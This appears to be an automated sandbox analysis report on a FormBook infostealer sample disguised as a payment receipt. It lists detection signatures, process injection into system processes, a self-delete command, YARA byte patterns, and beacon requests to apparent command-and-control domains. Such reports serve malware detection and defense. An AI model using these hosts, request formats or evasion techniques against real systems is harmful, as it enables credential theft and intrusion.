Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Final-Payment-Receipt.exe

Overview

General Information

Sample Name:Final-Payment-Receipt.exe
Analysis ID:320833
MD5:8f5d29001a9f5d4f62b47af6442be5ab
SHA1:4838464ffe421aad7c9d73ba19420b7e9c2c427d
SHA256:8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Final-Payment-Receipt.exe (PID: 1692 cmdline: 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
    • Final-Payment-Receipt.exe (PID: 5764 cmdline: C:\Users\user\Desktop\Final-Payment-Receipt.exe MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4732 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5932 cmdline: /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.Final-Payment-Receipt.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.Final-Payment-Receipt.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a537:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b53a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.Final-Payment-Receipt.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Final-Payment-Receipt.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Final-Payment-Receipt.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: Final-Payment-Receipt.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Final-Payment-Receipt.exeJoe Sandbox ML: detected
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_055EBFA0
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.wacrox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.trumpingitagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.themindofafunnygirl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.wacrox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.trumpingitagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.themindofafunnygirl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Nov 2020 21:20:27 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 31 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmpString found in binary or memory: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Final-Payment-Receipt.exe
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419D70 NtCreateFile,1_2_00419D70
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E20 NtReadFile,1_2_00419E20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419EA0 NtClose,1_2_00419EA0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F50 NtAllocateVirtualMemory,1_2_00419F50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419DC2 NtCreateFile,1_2_00419DC2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E1F NtReadFile,1_2_00419E1F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F4C NtAllocateVirtualMemory,1_2_00419F4C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_013F9910
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99A0 NtCreateSection,LdrInitializeThunk,1_2_013F99A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_013F9860
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9840 NtDelayExecution,LdrInitializeThunk,1_2_013F9840
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_013F98F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A20 NtResumeThread,LdrInitializeThunk,1_2_013F9A20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_013F9A00
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A50 NtCreateFile,LdrInitializeThunk,1_2_013F9A50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9540 NtReadFile,LdrInitializeThunk,1_2_013F9540
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95D0 NtClose,LdrInitializeThunk,1_2_013F95D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9710 NtQueryInformationToken,LdrInitializeThunk,1_2_013F9710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_013F97A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9780 NtMapViewOfSection,LdrInitializeThunk,1_2_013F9780
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_013F9660
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_013F96E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9950 NtQueueApcThread,1_2_013F9950
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99D0 NtCreateProcessEx,1_2_013F99D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9820 NtEnumerateKey,1_2_013F9820
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FB040 NtSuspendThread,1_2_013FB040
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98A0 NtWriteVirtualMemory,1_2_013F98A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9B00 NtSetValueKey,1_2_013F9B00
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA3B0 NtGetContextThread,1_2_013FA3B0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A10 NtQuerySection,1_2_013F9A10
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A80 NtOpenDirectoryObject,1_2_013F9A80
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FAD30 NtSetContextThread,1_2_013FAD30
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9520 NtWaitForSingleObject,1_2_013F9520
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9560 NtWriteFile,1_2_013F9560
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95F0 NtQueryInformationFile,1_2_013F95F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9730 NtQueryVirtualMemory,1_2_013F9730
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA710 NtOpenProcessToken,1_2_013FA710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA770 NtOpenThread,1_2_013FA770
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9770 NtSetInformationFile,1_2_013F9770
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9760 NtOpenProcess,1_2_013F9760
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9FE0 NtCreateMutant,1_2_013F9FE0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9610 NtEnumerateValueKey,1_2_013F9610
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9670 NtQueryInformationProcess,1_2_013F9670
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9650 NtQueryValueKey,1_2_013F9650
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96D0 NtCreateKey,1_2_013F96D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A50 NtCreateFile,LdrInitializeThunk,3_2_03759A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03759910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037599A0 NtCreateSection,LdrInitializeThunk,3_2_037599A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03759860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759840 NtDelayExecution,LdrInitializeThunk,3_2_03759840
